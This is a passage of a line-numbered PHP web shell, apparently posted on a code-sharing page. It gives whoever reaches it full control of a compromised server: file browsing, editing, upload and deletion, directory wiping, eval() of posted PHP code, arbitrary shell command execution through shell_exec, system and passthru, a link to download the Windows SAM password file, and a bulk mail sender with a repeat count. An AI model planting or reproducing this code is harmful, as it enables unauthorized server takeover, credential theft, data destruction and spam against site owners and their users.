  298. function get_space($dir) {
  299. $free = @diskfreespace($dir);
  300. if (!$free) {$free = 0;}
  301. $all = @disk_total_space($dir);
  302. if (!$all) {$all = 0;}
  303. $used = $all-$free;
  304. $used_f = @round(48.7/($all/$free),2);
  305. echo "".$used_f."";
  306. }
  307. }
  308. $sys=strtolower(substr(PHP_OS,0,3));
  309. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  310. <thead>
  311. <tr><td>";
  312. echo "<img src=".$surl."?&".$word."&dir&pic=o.b height= width=>";
  313. echo getenv('SERVER_SOFTWARE');
  314. echo "<br>";
  315. echo getenv('SERVER_NAME');
  316. echo ":";
  317. echo getenv('SERVER_PORT');
  318. echo "<br>";
  319. echo getenv('SERVER_ADMIN');
  320. if ($sys=="win") {
  321. echo "Windows";
  322. echo "<br>";
  323. echo "".getenv('COMPUTERNAME')."";
  324. echo "<br>";
  325. echo "Os:".getenv('OS')."";
  326. } else {
  327. echo "<br>Linux";
  328. }
  329. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  330. {
  331. $safe=1;
  332. echo "<br><font color=red>ON (secure)</font>";
  333. } else {
  334. $save=2;
  335. if ($sys=="win") {
  336. echo "<br><font color=green><a href=".$surl."?&".$word."&file_browser&file=C:/Windows/repair/sam&download>Off (not secure)</a></font>";
  337. }
  338. }
  339. if (isset($_GET['file'])) {
  340. echo "<br>Access:";
  341. if (@is_readable($j_f)) {
  342. echo "R";
  343. }
  344. if (@is_executable($j_f)) {
  345. echo "E";
  346. }
  347. if (@is_writable($j_d)) {
  348. echo "W";
  349. }
  350. echo "<br>Current_file:";
  351. echo "<a href=".$surl."?&".$word."&file_browser&file=";
  352. echo urlencode($p) ;
  353. echo ">".$p."</a>";
  354. }
  355. echo "<br>";
  356. echo "Start_dir:";
  357. echo "q94;q94;q94;";
  358. echo "<a href=".$surl."?&".$word."&file_browser&file=";
  359. echo urlencode($ps);
  360. echo ">".$ps."</a>";
  361. echo "<br>";
  362. if (isset($_GET['file'])) {
  363. echo "Free Space:";
  364. get_space(urldecode($_GET['file']));
  365. echo "gb";
  366. }
  367. echo "</td>";
  368. ?>
  369. <style type="text/css">
  370. body { background-color:#8B8989;font-family:trebuchet Ms; color:black }
  371. textarea {
  372. border-top-width: 1px;
  373. font-weight: bold;
  374. border-left-width: 1px;
  375. font-size: 10px;
  376. border-left-color: #8B8989;
  377. background:#8B8989;
  378. border-bottom-width: 1px;
  379. border-bottom-color:#8B8989;
  380. color: black;
  381. border-top-color:#8B8989;
  382. font-family: trebuchet Ms;
  383. border-right-width: 1px;
  384. border-right-color: #8B8989;
  385. }
  386. input {
  387. border-top-width: 1px;
  388. font-weight: bold;
  389. border-left-width: 1px;
  390. font-size: 10px;
  391. border-left-color: #8B8989;
  392. background: #8B8989;
  393. border-bottom-width: 1px;
  394. border-bottom-color: #8B8989;
  395. color: black;
  396. border-top-color:#8B8989;
  397. font-family: trebuchet Ms;
  398. border-right-width: 1px;
  399. border-right-color:#8B8989;
  400. }
  401. td {
  402. font-size: 10px;
  403. font-family: verdana;
  404. }
  405. th {
  406. font-size: 10px;
  407. font-family: verdana;
  408. }
  409. a:link {
  410. text-decoration: none;
  411. }
  412. a:visited {
  413. text-decoration: none;
  414. color:blue;
  415. }
  416. a:active {
  417. text-decoration: none;
  418. }
  419. a:hover {
  420. color: #00ff00;
  421. text-decoration: none;
  422. }
  423. back {
  424. background-color:grey;
  425. }
  426. ul#Navigation {
  427. position:absolute;
  428. width: 10em;
  429. margin: 0; padding: 0.8em;
  430. border: 1px solid #8B8989;
  431. background-color: #8B8989;
  432. }
  433. * html ul#Navigation { /* Korrekturen fuer IE 5.x */
  434. width: 11.6em;
  435. w\idth: 10em;
  436. padding-left: 0;
  437. padd\ing-left: 0.8em;
  438. }
  439. ul#Navigation li {
  440. list-style: none;
  441. margin: 0.4em; padding: 0;
  442. }
  443. ul#Navigation a {
  444. display:block;
  445. padding: 0.2em;
  446. text-decoration: none; font-weight: bold;
  447. border: 1px solid black;
  448. border-left-color: black; border-top-color: black;
  449. color: black; background-color: #8B8989;
  450. }
  451. * html ul#Navigation a { /* Breitenangaben nur fuer IE */
  452. width: 100%;
  453. w\idth: 8.8em;
  454. }
  455. ul#Navigation a:hover {
  456. border-color: white;
  457. border-left-color: black; border-top-color: black;
  458. color: white; background-color: #8B8989;
  459. }
  460. </style>
  461. <?php
  462. if (!function_exists(rename_all)) {
  463. function rename_all($dir,$prefix,$name,$del) {
  464. $r_dir=opendir($dir);
  465. while (false !== ($file_r = readdir($r_dir))) {
  466. if (@filetype($dir."/".$file_r)=="file") {
  467. $i++;
  468. @copy($dir."/".$file_r,$dir."/".$i.".".$prefix.$name) or die ("[-]Error renaming file : ".$file_r."");
  469. if ($del=="yes") {
  470. @unlink($dir."/".$file_r) or die ("[-]Error deleting file(s)!");
  471. }
  472. }
  473. }
  474. echo "Successfully renamed file(s)!";
  475. }
  476. }
  477. if (!function_exists(get_perms)) {
  478. function get_perms($file) {
  479. if (@file_exists($file)) {
  480. if (@is_readable($file)) {
  481. echo "<b>R</b>";
  482. }
  483. if (@is_executable($file)) {
  484. echo "<b>E</b>";
  485. }
  486. if (@is_writable($file)) {
  487. echo "<b>W</b>";
  488. }
  489. } else {
  490. echo "[-]Error";
  491. }
  492. }
  493. }
  494. if (!function_exists(search_file)) {
  495. function search_file($search,$dir) {
  496. global $word;
  497. global $surl;
  498. $d_s=opendir($dir);
  499. while (false !== ($file_s = readdir($d_s))) {
  500. if (preg_match("/".$search."/i",$file_s)) {
  501. echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($dir)."/".urlencode($file_s).">".$file_s."</a><br>";
  502. }
  503. }
  504. }
  505. }
  506. if (!function_exists(copy_file)) {
  507. function copy_file($file,$to) {
  508. if (@file_exists($file)) {
  509. @copy($file,$to) or die ("[-]Error copying file!");
  510. echo "Successfully copied file!";
  511. } else {
  512. echo "[-]File Doesnt exist!";
  513. }
  514. }
  515. }
  516. if (!function_exists(send_mail)) {
  517. function send_mail($from,$to,$text,$subject,$times) {
  518. while ($i<$times) {
  519. $i++;
  520. $header = "From: $from\r\n";
  521. @mail($to, $subject, $text, $header) or die ("[-]Error sending mail(s)!");
  522. }
  523. echo "Successfully sent mail(s) to ".$to."!";
  524. }
  525. }
  526. if (!function_exists(read_file)) {
  527. function read_file($file) {
  528. $file=@fopen($file,"r");
  529. echo fread($file,10000);
  530. fclose($file);
  531. }
  532. }
  533. if (!function_exists(write_file)) {
  534. function write_file($file,$text) {
  535. if (@is_writable($file)) {
  536. if (@file_exists($file)) {
  537. $file_w=@fopen(urldecode($file),"w") or die ("[-]Error");
  538. if (fwrite($file_w,$text)) {
  539. echo "Successfully written to file(s)!";
  540. }
  541. }
  542. }
  543. else {
  544. echo "[-]Error";
  545. exit;
  546. }
  547. }
  548. }
  549. if (!function_exists(count_all)) {
  550. function count_all($dir) {
  551. $c_d=opendir($dir);
  552. while (false !== ($file_c = readdir($c_d))) {
  553. if (@filetype($dir."/".$file_c)=="file") {
  554. $file_c_s++;
  555. }
  556. else
  557. {
  558. $dir_c++;
  559. }
  560. }
  561. echo "Directories:";
  562. echo $dir_c++;
  563. echo "||";
  564. echo "Files:";
  565. echo $file_c_s;
  566. }
  567. }
  568. if (!function_exists(check_access)) {
  569. function check_access($file) {
  570. if (@is_readable($file)) {
  571. echo "R";
  572. }
  573. if (@is_executable($file)) {
  574. echo "E";
  575. }
  576. if (@is_writable($file)) {
  577. echo "W";
  578. }
  579. }
  580. }
  581. if (!function_exists(clear_dir)) {
  582. function clear_dir($dir) {
  583. $o_d=opendir($dir);
  584. while (false !== ($file = readdir($o_d))) {
  585. if (@filetype(urldecode($_GET['file'])."/".$file)=="file") {
  586. unlink(urldecode($dir)."/".$file) or die ("[-]Error @ file:".$file."");
  587. }
  588. }
  589. echo "Successfully cleared directory!";
  590. }
  591. }
  592. ?>
  593. <?php
  594. // real code start !
  595. if (isset($_GET['update'])) {
  596. echo "<center><table border=\"1\" rules=\"groups\">
  597. <thead>
  598. <tr><td>";
  599. check_update();
  600. exit;
  601. }
  602. if (isset($_GET['rmdir'])) {
  603. echo "<center><table border=\"1\" rules=\"groups\">
  604. <thead>
  605. <tr><td>";
  606. @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
  607. echo "Successfully deleted dir(s)!";
  608. exit;
  609. }
  610. if (isset($_GET['upload'])) {
  611. $uploaddir = urldecode($_POST['file']);
  612. print "<pre>";
  613. if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir ."/". $_FILES['userfile']['name'])) {
  614. echo "<center><table border=\"1\" rules=\"groups\">
  615. <thead>
  616. <tr><td>";
  617. print "Successfully uploadet file(s)!";
  618. } else {
  619. echo "<center><table border=\"1\" rules=\"groups\">
  620. <thead>
  621. <tr><td>";
  622. print "[-]Error";
  623. }
  624. exit;
  625. }
  626. if (isset($_GET['search'])) {
  627. echo "<center><table border=\"1\" rules=\"groups\">
  628. <thead>
  629. <tr><td>";
  630. search_file($_POST['search'],urldecode($_POST['dir']));
  631. exit;
  632. }
  633. if (isset($_GET['getenv'])) {
  634. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  635. <thead><br>
  636. <tr><td>";
  637. echo getenv($_GET['getenv']);
  638. exit;
  639. }
  640. if (isset($_GET['php_info'])) {
  641. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  642. <thead><br>
  643. <tr><td>";
  644. phpinfo();
  645. exit;
  646. }
  647. if (isset($_GET['defined_vars'])) {
  648. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  649. <thead><br>
  650. <tr><td>";
  651. echo "<center><textarea rows=40 cols=120>";
  652. $vars=get_defined_vars();
  653. print_r($vars);
  654. echo "</textarea>";
  655. exit;
  656. }
  657. if (isset($_GET['env'])) {
  658. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  659. <thead><br>
  660. <tr><td>";
  661. $ary=get_defined_vars();
  662. $it=array_keys($ary);
  663. foreach ($it as $i) {
  664. echo "<a href=".$surl."?&".$word."&getenv=".$i.">".$i."</a><br>";
  665. }
  666. exit;
  667. }
  668. if (isset($_GET['play'])) {
  669. echo "<embed src=".urlencode($filename)." autostart=true loop=true hidden=true height=0 width=0>";
  670. exit;
  671. }
  672. if (isset($_GET['special_crypt'])) {
  673. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  674. <thead><br>
  675. <tr><td>";
  676. echo "<textarea rows=15 cols=90>";
  677. if (isset($_POST['submit'])) {
  678. $file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
  679. $meth=$_POST['crypt'];
  680. if ($meth=="1") {
  681. echo htmlspecialchars(md5(fread($file,10000)));
  682. } elseif ($meth=="2") {
  683. echo htmlspecialchars(crypt(fread($file,10000)));
  684. }
  685. elseif ($meth=="3") {
  686. echo htmlspecialchars(sha1(fread($file,10000)));
  687. }
  688. elseif ($meth=="4") {
  689. echo htmlspecialchars(crc32(fread($file,10000)));
  690. }
  691. elseif ($meth=="5") {
  692. echo htmlspecialchars(urlencode(fread($file,10000)));
  693. }
  694. elseif ($meth=="6") {
  695. echo htmlspecialchars(urldecode(fread($file,10000)));
  696. }
  697. elseif ($meth=="7") {
  698. echo htmlspecialchars(base64_encode(fread($file,10000)));
  699. }
  700. elseif ($meth=="8") {
  701. echo htmlspecialchars(base64_decode(fread($file,10000)));
  702. }
  703. }
  704. echo "</textarea><div align=left>";
  705. ?>
  706. <form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&special_crypt method="post">
  707. file: <input name="userfile" type="file"><br><br>
  708. <input type="submit" value="Start" name="submit"><br>
  709. <input type=radio name=crypt value=1>md5();<br>
  710. <input type=radio name=crypt value=2>crypt();<br>
  711. <input type=radio name=crypt value=3>sha1();<br>
  712. <input type=radio name=crypt value=4>crc32();<br>
  713. <input type=radio name=crypt value=5>urlencode();<br>
  714. <input type=radio name=crypt value=6>urldecode();<br>
  715. <input type=radio name=crypt value=7>base64_encode();<br>
  716. <input type=radio name=crypt value=5>base64_decode();<br>
  717. <?php
  718. exit;
  719. }
  720. if (isset($_GET['crypt'])) {
  721. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  722. <thead><br>
  723. <tr><td>";
  724. ?>
  725. <form action=<?php echo $surl ?>?&<?php echo $word ?>&crypt method="post">
  726. Crypt:<br>
  727. <textarea rows=12 cols=120 name=crypt>
  728. </textarea>
  729. <?php
  730. $text=$_POST['crypt'];
  731. ?>
  732. md5:q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input size=40 type=text value=<?php echo htmlspecialchars(md5($text)) ?>><br><br>
  733. crypt:q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input size=40 type=text value=<?php echo htmlspecialchars(crypt($text)) ?>><br><br>
  734. sha1:q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input size=40 type=text value=<?php echo htmlspecialchars(sha1($text)) ?>><br><br>
  735. crc32:q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input size=40 type=text value=<?php echo htmlspecialchars(crc32($text)) ?>><br><br>
  736. urlencode:q94;q94;q94;q94;q94;q94;q94;q94;<input size=40 type=text value=<?php echo htmlspecialchars(urlencode($text)) ?>><br><br>
  737. urldecode:q94;q94;q94;q94;q94;q94;q94;q94;<input size=40 type=text value=<?php echo htmlspecialchars(urldecode($text)) ?>><br><br>
  738. base64_encode:q94;<input type=text size=40 value=<?php echo base64_encode($text) ?>><br><br>
  739. base64_decode:q94;<input type=text size=40 value=<?php echo base64_decode($text) ?>><br><br>
  740. <?php
  741. echo "<input type=submit value=Start></form><form action=".$surl."?&".$word."&special_crypt method=post><input type=submit value=file_inload_crypt>";
  742. exit;
  743. }
  744. if (isset($_GET['php_code'])) {
  745. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  746. <thead><br>
  747. <tr><td>";
  748. ?>
  749. <form action=<?php echo $surl ?>&<?php echo $word ?>&php_code method="post">
  750. <textarea rows=12 cols=120 name=code>
  751. </textarea>
  752. <textarea rows=12 cols=120 readonly>
  753. <?php
  754. eval($_POST['code']);
  755. echo "</textarea>";
  756. echo "<br><br><input type=submit value=Start>";
  757. exit;
  758. }
  759. if (isset($_GET['search_st'])) {
  760. if (isset($_POST['search'])) {
  761. search_file($_POST['search'],$_POST['dir']);
  762. }
  763. exit;
  764. }
  765. if (isset($_GET['rename_all'])) {
  766. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  767. <thead><br>
  768. <tr><td>";
  769. rename_all(urldecode($_POST['d']),$_POST['prefix'],$_POST['name'],$_POST['del']);
  770. exit;
  771. }
  772. if (isset($_GET['special_d'])) {
  773. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  774. <thead><br>
  775. <tr><td>";
  776. $way=$_POST['way'];
  777. if ($way=="1") {
  778. clear_dir($_GET['file']);
  779. exit;
  780. }
  781. if ($way=="2") {
  782. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  783. <thead><br>
  784. <tr><td>";
  785. ?>
  786. <form action=<?php echo $surl ?>?&<?php echo $word ?>&rename_all method="post">
  787. Prefix:<br><input type="text" name="prefix"><br>
  788. Name:<br><input type="text" name="name"><br>
  789. <input type="hidden" name="d" value=<?php echo urlencode($filename) ?>>
  790. Delete old files?:<input type="radio" name="del" value="yes"><br>
  791. <br><input type="submit" value="Rename">
  792. <?php
  793. exit;
  794. }
  795. }
  796. if (isset($_GET['special_dir'])) {
  797. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  798. <thead><br>
  799. <tr><td>";
  800. ?>
  801. <form action=<?php echo $surl ?>?&<?php echo $word ?>&special_d&file=<?php echo urlencode($filename) ?> method=post>
  802. <input type="radio" name="way" value="1">Clear Dir<input type=hidden name=dir value=<?php echo urlencode($filename) ?>><br><br>
  803. <input type="radio" name="way" value="2">Rename with prefix<br><br>
  804. <input type="submit" name="sub" value="Start">
  805. <?php
  806. exit;
  807. }
  808. if (isset($_GET['delete'])) {
  809. if (@file_exists($filename)) {
  810. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  811. <thead>
  812. <tr><td>";
  813. @unlink($filename) or die ("[-]Error deleting file!");
  814. echo "Successfully Deleted File!";
  815. exit;
  816. }
  817. }
  818. if (isset($_GET['save'])) {
  819. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  820. <thead>
  821. <tr><td>";
  822. write_file(urldecode($_POST['file']),stripslashes($_POST['text']));
  823. exit;
  824. }
  825. if (isset($_GET['exec'])) {
  826. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  827. <thead>
  828. <tr><td><center>";
  829. @chdir(urldecode($_POST['dir']));
  830. echo "<textarea rows=15 cols=114>";
  831. echo shell_exec($_POST['command']);
  832. echo "</textarea>";
  833. exit;
  834. }
  835. if (isset($_GET['mkdir'])) {
  836. if (isset($_POST['name'])) {
  837. echo "<center><table border=\"1\" rules=\"groups\">
  838. <thead>
  839. <tr><td>";
  840. mkdir(urldecode($_POST['dir'])."/".$_POST['name']) or die ("[-]Error creating dir!");
  841. echo "Successfully created dir!";
  842. }
  843. exit;
  844. }
  845. if (isset($_GET['mkfile'])) {
  846. if (isset($_POST['name'])) {
  847. echo "<center><table border=\"1\" rules=\"groups\">
  848. <thead>
  849. <tr><td>";
  850. $dir=urldecode($_POST['dir']);
  851. $filed=$_POST['name'];
  852. if (@file_exists($dir."/".$filed)) {
  853. echo "[-]Allready exists!";
  854. exit;
  855. }
  856. $file_c=@fopen($dir."/".$filed,"w") or die ("[-]Can't create file!");
  857. echo "Scuessfully created file(s)!";
  858. }
  859. exit;
  860. }
  861. if (isset($_GET['edit'])) {
  862. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  863. <thead>
  864. <tr><td>";
  865. if (@file_exists($filename)) {
  866. echo "<form action=".$surl."?&".$word."&save method=post><textarea rows=15 cols=90 name=text>";
  867. read_file($filename);
  868. echo "</textarea><br><br><input type=hidden name=file value=".urlencode($_GET['file'])."><input type=submit name=sub value=Save>";
  869. }
  870. exit;
  871. }
  872. if (isset($_GET['copy_start'])) {
  873. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  874. <thead>
  875. <tr><td>";
  876. copy_file($_POST['from'],$_POST['to']);
  877. exit;
  878. }
  879. if (isset($_GET['copy_file'])) {
  880. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  881. <thead>
  882. <tr><td>";
  883. ?>
  884. <form action=<?php echo $surl ?>?&<?php echo $word ?>&copy_start method="post">
  885. New:<br><textarea rows=4 cols=70 name="to"><?php echo realpath($filename) ?></textarea><br><br>
  886. Old:<br><textarea rows=4 cols=70 name="from"><?php echo realpath($filename) ?></textarea><br><br>
  887. <input type="submit" name="sub" value="Copy">
  888. <?php
  889. exit;
  890. }
  891. if (isset($_GET['send_mail_st'])) {
  892. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  893. <thead>
  894. <tr><td>";
  895. if (isset($_POST['from']))
  896. {
  897. if (isset($_POST['to']))
  898. {
  899. if (isset($_POST['text']))
  900. {
  901. if (isset($_POST['subject']))
  902. {
  903. if (isset($_POST['times']))
  904. {
  905. send_mail($_POST['from'],$_POST['to'],$_POST['text'],$_POST['subject'],$_POST['times']) ;
  906. exit;
  907. }
  908. }
  909. }
  910. }
  911. }
  912. }
  913. if (isset($_GET['send_mail'])) {
  914. echo "<center><table border=\"1\" width=600 rules=\"groups\">
  915. <thead>
  916. <tr><td>";
  917. ?>
  918. <form action=<?php echo $surl ?>?&<?php echo $word ?>&send_mail_st method="post">
  919. From:q94;q94;q94;q94;<input type="text" name="from"><br><br>
  920. To:q94;q94;q94;q94;q94;q94;q94;<input type="text" name="to"><br><br>
  921. Subject:q94;q94;<input type="text" name="subject"><br><br>
  922. Times:q94;q94;q94;<input type="text" name="times"><br><br>
  923. Text:<br><textarea rows=15 cols=60 name="text"></textarea><br><br>
  924. <input type="submit" name="sub" value="Send!">
  925. <?php
  926. exit;
  927. }
  928. if (isset($_GET['file_browser'])) {
  929. for ($i=0;$i<4;$i++) {
  930. if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
  931. echo "<center><table border=\"1\" rules=\"groups\">
  932. <thead>
  933. <tr><td>";
  934. echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($filename)."&img><img src='".urldecode($surl)."?&".$word."&file=".urldecode($filename)."&img' height= width= border=0><br>";
  935. exit;
  936. } }
  937. if (@filetype($j_f)=="file") {
  938. echo "<center><table border=\"1\" rules=\"groups\"
  939. <thead>
  940. <tr><td>";
  941. highlight_file($j_f);
  942. exit;
  943. }
  944. echo "<center><table border=\"1\" rules=\"groups\">
  945. <thead>
  946. <tr>
  947. <th></th><td>";
  948. count_all($j_d);
  949. echo "</tr>";
  950. echo "<center><table border=\"1\" rules=\"groups\">
  951. <thead>
  952. <tr>
  953. <th>Filename</th><th>Edit</th><th>Copy</th><th>Download</th><th>Delete<th>Perms</th><th>Access</th> ";
  954. $o_d=opendir($j_d);
  955. while (false !== ($file = readdir($o_d))) {
  956. echo " <tbody>
  957. <tr>
  958. <td>";
  959. if (@filetype($j_d."/".$file)=="dir") {
  960. echo "</a><img src=".$surl."?&".$word."&dir&pic=dir height=12 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[".$file."]";
  961. } else {
  962. echo "<img src=".$surl."?&".$word."&dir&pic=ext_wri height=9 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
  963. echo $file;
  964. }
  965. echo "<br></a></td><td><a href=".$surl."&".$word."&edit&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
  966. if (@filetype($j_d."/".$file)=="file") {
  967. echo "<center>[Edit]";
  968. }
  969. else {
  970. echo "</a><center>[-]";
  971. }
  972. echo "</a></td><td><a href=".$surl."&".$word."&copy_file&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
  973. if (@filetype($j_d."/".$file)=="file") {
  974. echo "<center>[Copy]";
  975. } else {
  976. echo "</a><center>[-]";
  977. }
  978. echo "</a></td><td><a href=".$surl."&".$word."&download&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
  979. if (@filetype($j_d."/".$file)=="file") {
  980. echo "<center>[Download]";
  981. } else {
  982. echo "</a><center>[-]";
  983. }
  984. echo "</a></td><td><a href=".$surl."&".$word."&delete&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
  985. if (@filetype($j_d."/".$file)=="file") {
  986. echo "<center>[Delete]";
  987. } else {
  988. echo "</a><center><a href=".$surl."&".$word."&rmdir&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[Delete]</a>";
  989. }
  990. echo "<td><center>";
  991. echo @fileowner($j_f."/".$file);
  992. echo "</td>";
  993. echo "<td><center>";
  994. get_perms(fileperms($j_f."/".$file));
  995. echo "</td>";
  996. echo "</a></td>";
  997. }
  998. echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">
  999. <thead>
  1000. <tr>
  1001. <th></th><td>";
  1002. ?>
  1003. <form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&upload method="post">
  1004. file: q94;q94;q94;q94;q94;q94;q94;q94;<input name="userfile" type="file">
  1005. <input type="hidden" name="file" value=<?php echo urlencode($_GET['file']) ?>>
  1006. <input type="submit" value="Upload"><br><br><?php
  1007. if (@is_writable($j_d)) {
  1008. echo "<font color=green>[Ok]</font>";
  1009. } else {
  1010. echo "<font color=red>[No]</font>";
  1011. }
  1012. ?>
  1013. </form>
  1014. <?php
  1015. echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
  1016. <thead>
  1017. <tr>
  1018. <th></th><td>";
  1019. ?>
  1020. <form action=<?php echo $surl ?>&<?php echo $word ?>&search method="post">
  1021. search: q94;q94;q94;q94;<input name="search" type="text">
  1022. <input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
  1023. q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input type="submit" value="Search">
  1024. </form>
  1025. <?php
  1026. echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
  1027. <thead>
  1028. <tr>
  1029. <th></th><td>";
  1030. ?>
  1031. <form action=<?php echo $surl ?>?&<?php echo $word ?>&mkdir method="post">
  1032. name: q94;q94;q94;q94;q94;<input name="name" type="text">
  1033. <input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
  1034. q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input type="submit" value="mkdir">
  1035. </form>
  1036. <?php
  1037. if (@is_writable($j_d)) {
  1038. echo "<font color=green>[Ok]</font>";
  1039. } else {
  1040. echo "<font color=red>[No]</font>";
  1041. }
  1042. echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
  1043. <thead>
  1044. <tr>
  1045. <th></th><td>";
  1046. ?>
  1047. <form action=<?php echo $surl ?>&<?php echo $word ?>&mkfile method="post">
  1048. name:q94;q94;q94;q94;q94; <input name="name" type="text">
  1049. <input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
  1050. q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input type="submit" value="mkfile">
  1051. </form>
  1052. <?php
  1053. if (@is_writable($j_d)) {
  1054. echo "<font color=green>[Ok]</font>";
  1055. } else {
  1056. echo "<font color=red>[No]</font>";
  1057. }
  1058. echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
  1059. <thead>
  1060. <tr>
  1061. <th></th><td>";
  1062. ?>
  1063. <form action=<?php echo $surl ?>&<?php echo $word ?>&exec method="post">
  1064. command: <input name="command" type="text">
  1065. <input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
  1066. q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;q94;<input type="submit" value="execute">
  1067. </form>
  1068. <?php
  1069. echo "</td><center><table border=\"1\" rules=\"groups\">
  1070. <thead>
  1071. <tr>
  1072. <th></th><td><a href=".$surl."?&".$word."&special_dir&file=".urlencode($filename).">Special DirOptions</a></td> ";
  1073. echo "</a>";
  1074. exit;
  1075. }
  1076. ?>
  1077. <html>
  1078. <ul id="Navigation">
  1079. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&file_browser&file=<?php echo "." ?>>File_Browser</a></li>
  1080. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&send_mail>Send Mail(s)</a></li>
  1081. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_code>php_code</a></li>
  1082. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&crypt>crypter</a></li>
  1083. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_info>php_info()</a></li>
  1084. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&defined_vars>defined_vars()</a></li>
  1085. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&env>env()</a></li>
  1086. <li><a href=<?php echo $surl ?>&<?php echo $word ?>&update>update()</a></li>
  1087. </ul>
  1088. <center><table border="1" rules="groups">
  1089. <thead>
  1090. <tr>
  1091. <th></th>
  1092. <td>
  1093. <form action=<?php echo $surl ?>?&<?php echo $word ?>&exec_st method="post">
  1094. <input type="submit" name="sub" value="Execute"><br>
  1095. <br>
  1096. <input type="text" name="command">
  1097. <br>
  1098. <input type="radio" name="method" value="1">shell_exec();
  1099. <input type="radio" name="method" value="2">system();
  1100. <input type="radio" name="method" value="3">passthru();
  1101. <input type="radio" name="method" value="4">automatic();<br>
  1102. <textarea name="exec" rows=15 cols=90>
  1103. <?php
  1104. if (isset($_GET['exec_st'])) {
  1105. $meth=$_POST['method'];
  1106. $com=$_POST['command'];
  1107. if (isset($meth)) {
  1108. if ($meth=="1") {
  1109. echo shell_exec($com);
  1110. }
  1111. elseif($meth=="2") {
  1112. echo system($com);
  1113. }
  1114. elseif ($meth=="3") {
  1115. passthru($com);
  1116. }
  1117. elseif ($meth=="4") {
  1118. if (function_exists(shell_exec)) {
  1119. echo shell_exec($com);
  1120. }
  1121. elseif (function_exists(system)) {
  1122. echo system($com);
  1123. }
  1124. elseif (function_exists(passthru)) {
  1125. echo passthru($com);
  1126. }
  1127. else {
  1128. echo "[-]Error";
  1129. }
  1130. }
  1131. }
  1132. }
  1133. echo "</textarea>";
  1134. exit;
  1135. ?>

comments powered by Disqus